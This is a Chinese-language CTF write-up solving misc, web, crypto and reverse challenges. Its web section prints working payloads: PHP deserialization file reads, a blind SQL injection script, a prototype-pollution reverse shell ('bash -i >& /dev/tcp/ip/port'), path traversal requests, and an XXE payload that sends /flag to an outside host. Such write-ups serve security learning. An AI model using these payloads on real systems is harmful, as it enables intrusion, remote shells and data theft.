She1don ,永远滴神。
Misc 签到 访问/static/index.js 。
1 2 3 4 5 6 7 8 9 10 11 12 var IAvaDcnZ1 = "icq68ec6e55677aaff76e5818cf3f46a" ;$.ajax({ url: '\x66\x6c\x61\x67\x2e\x70\x68\x70' , type: '\x50\x4f\x53\x54' , data: '\x74\x6f\x6b\x65\x6e\x3d' + IAvaDcnZ1, success: function (StRvT3 ) { var StRvT3 = StRvT3; console ['\x6c\x6f\x67' ](StRvT3) } })
Web AreUSerialz 解法一 PHP 高版本可以使用public 绕过,直接构造如下,可以读取/etc/passwd ,无法读到flag.php 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php class FileHandler { public $op = 2 ; public $filename = "php://filter/convert.base64-encode/resource=/etc/passwd" ; public $content; } echo urlencode(serialize(new FileHandler()));
读取/etc/apache2/httpd.conf 发现web 目录在/web/html/ 下,遂读取/web/html/flag.php 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php class FileHandler { public $op = 2 ; public $filename = "php://filter/convert.base64-encode/resource=/web/html/flag.php" ; public $content; } echo urlencode(serialize(new FileHandler()));
解法二 P 牛去年八月曾在圈子里发过的一篇文章,指出可以用大写的S 来表示字符串,此时后面的字符串可以使用16 进制来表示。
1 s:5:"<null_byte>South<null_byte>" -> S:5:"\00South\00"
因此在这里可以这样构造。
1 2 3 4 5 6 7 8 9 10 11 12 13 <?php class FileHandler { protected $op = 2 ; protected $filename = "php://filter/convert.base64-encode/resource=/web/html/flag.php" ; protected $content; } echo urlencode(str_replace("\00" , "\\00" , str_replace("s:" , "S:" , serialize(new FileHandler()))));
trace 有点恼人的是一旦超过二十条记录就要重置容器。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 import requestsimport timeurl = "http://f17a46f20e89437da0bc1c200f3e295bec352db6a69b4911.cloudgame2.ichunqiu.com/register_do.php" flag = "" for i in range(1 , 66 ): for j in range(33 , 126 ): data = { 'username' : "2'^if(ascii(substr((select `2` from (select 1,2 union select * from flag)a limit 1,1)," + str( i) + ",1))=" + str(j) + ",exp(999) or sleep(5),exp(999)) and '1" } s = time.time() r = requests.post(url, data=data) e = time.time() if e - s > 5 : flag = flag + chr(j) print(flag) break
notes Nodejs 原型链污染,CVE-2019-10795 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 …… edit_note(id, author, raw) { undefsafe(this .note_list, id + '.author' , author); undefsafe(this .note_list, id + '.raw_note' , raw); } …… app.route('/edit_note' ) .get(function (req, res ) { res.render('mess' , {message : "please use POST to edit a note" }); }) .post(function (req, res ) { let id = req.body.id; let author = req.body.author; let enote = req.body.raw; if (id && author && enote) { notes.edit_note(id, author, enote); res.render('mess' , {message : "edit note sucess" }); } else { res.render('mess' , {message : "edit note failed" }); } }) …… app.route('/status' ) .get(function (req, res ) { let commands = { "script-1" : "uptime" , "script-2" : "free -m" }; for (let index in commands) { exec(commands[index], {shell :'/bin/bash' }, (err, stdout, stderr) => { if (err) { return ; } console .log(`stdout: ${stdout} ` ); }); } res.send('OK' ); res.end(); })
author 和raw 皆可。
1 2 3 4 5 6 7 POST /edit_note id=__proto__&author=bash -i >%26 /dev/tcp/ip/port 0>%261 GET /status # flag{de63de21-082b-4a9d-acbd-7d47a55840c6}
filejava 一个任意文件读取,/file_in_java/DownloadServlet?filename=../../../../WEB-INF/web.xml 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi ="http://www.w3.org/2001/XMLSchema-instance" xmlns ="http://java.sun.com/xml/ns/javaee" xsi:schemaLocation ="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id ="WebApp_ID" version ="2.5" > <display-name > file_in_java</display-name > <welcome-file-list > <welcome-file > upload.jsp</welcome-file > </welcome-file-list > <servlet > <description > </description > <display-name > UploadServlet</display-name > <servlet-name > UploadServlet</servlet-name > <servlet-class > cn.abc.servlet.UploadServlet</servlet-class > </servlet > <servlet-mapping > <servlet-name > UploadServlet</servlet-name > <url-pattern > /UploadServlet</url-pattern > </servlet-mapping > <servlet > <description > </description > <display-name > ListFileServlet</display-name > <servlet-name > ListFileServlet</servlet-name > <servlet-class > cn.abc.servlet.ListFileServlet</servlet-class > </servlet > <servlet-mapping > <servlet-name > ListFileServlet</servlet-name > <url-pattern > /ListFileServlet</url-pattern > </servlet-mapping > <servlet > <description > </description > <display-name > DownloadServlet</display-name > <servlet-name > DownloadServlet</servlet-name > <servlet-class > cn.abc.servlet.DownloadServlet</servlet-class > </servlet > <servlet-mapping > <servlet-name > DownloadServlet</servlet-name > <url-pattern > /DownloadServlet</url-pattern > </servlet-mapping > </web-app >
分别读取几个文件下来反编译分析。
1 2 3 4 5 GET /file_in_java/DownloadServlet?filename=../../../../WEB-INF/classes/cn/abc/servlet/ListFileServlet.class GET /file_in_java/DownloadServlet?filename=../../../../WEB-INF/classes/cn/abc/servlet/UploadServlet.class GET /file_in_java/DownloadServlet?filename=../../../../WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
在UploadServlet 中有所发现。
1 2 3 4 5 6 7 8 9 if (filename.startsWith("excel-" ) && "xlsx" .equals(fileExtName)) try { Workbook wb1 = WorkbookFactory.create(in); Sheet sheet = wb1.getSheetAt(0 ); System.out.println(sheet.getFirstRowNum()); } catch (InvalidFormatException e) { System.err.println("poi-ooxml-3.10 has something wrong" ); e.printStackTrace(); }
CVE-2014-3529 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag" > <!ENTITY % remote SYSTEM "http://ip/evil.xml" > %remote; %all; ]> <root > &send; </root > …… <!ENTITY % all "<!ENTITY send SYSTEM 'http://ip?file=%file;'>" > ……
Crypto boom MD5 查出来en5oy 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 from z3 import *x = Int('x' ) y = Int('y' ) z = Int('z' ) s = Solver() s.add(3 * x - y + z == 185 ) s.add(2 * x + 3 * y - z == 321 ) s.add(x + y + z == 173 ) print s.model() from z3 import *x = Int('x' ) s = Solver() s.add(x * x + x - 7943722218936282 == 0 ) print s.model()
you raise me up 丢进sage 。
1 2 3 4 5 6 7 8 m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075 c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499 n = 2 **512 m = Mod(m,n) c = Mod(c,n) discrete_log(c,m)
Reverse bang 脱壳后用dex2jar 就可以看到了。
参考文章,使用Frida给apk脱壳并穿透加固Hook函数 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 public void onClick (View paramAnonymousView) { String str = localEditText.getText().toString(); paramAnonymousView = paramBundle.getText().toString(); if (str.equals(paramAnonymousView)) { MainActivity.showmsg("user is equal passwd" ); } else if ((str.equals("admin" ) & paramAnonymousView.equals("pass71487" ))) { MainActivity.showmsg("success" ); MainActivity.showmsg("flag is flag{borring_things}" ); } else { MainActivity.showmsg("wrong" ); } }
signal win32 的虚拟机,逻辑很清晰,直接手动逆向即可。
flag{757515121f3d478} 。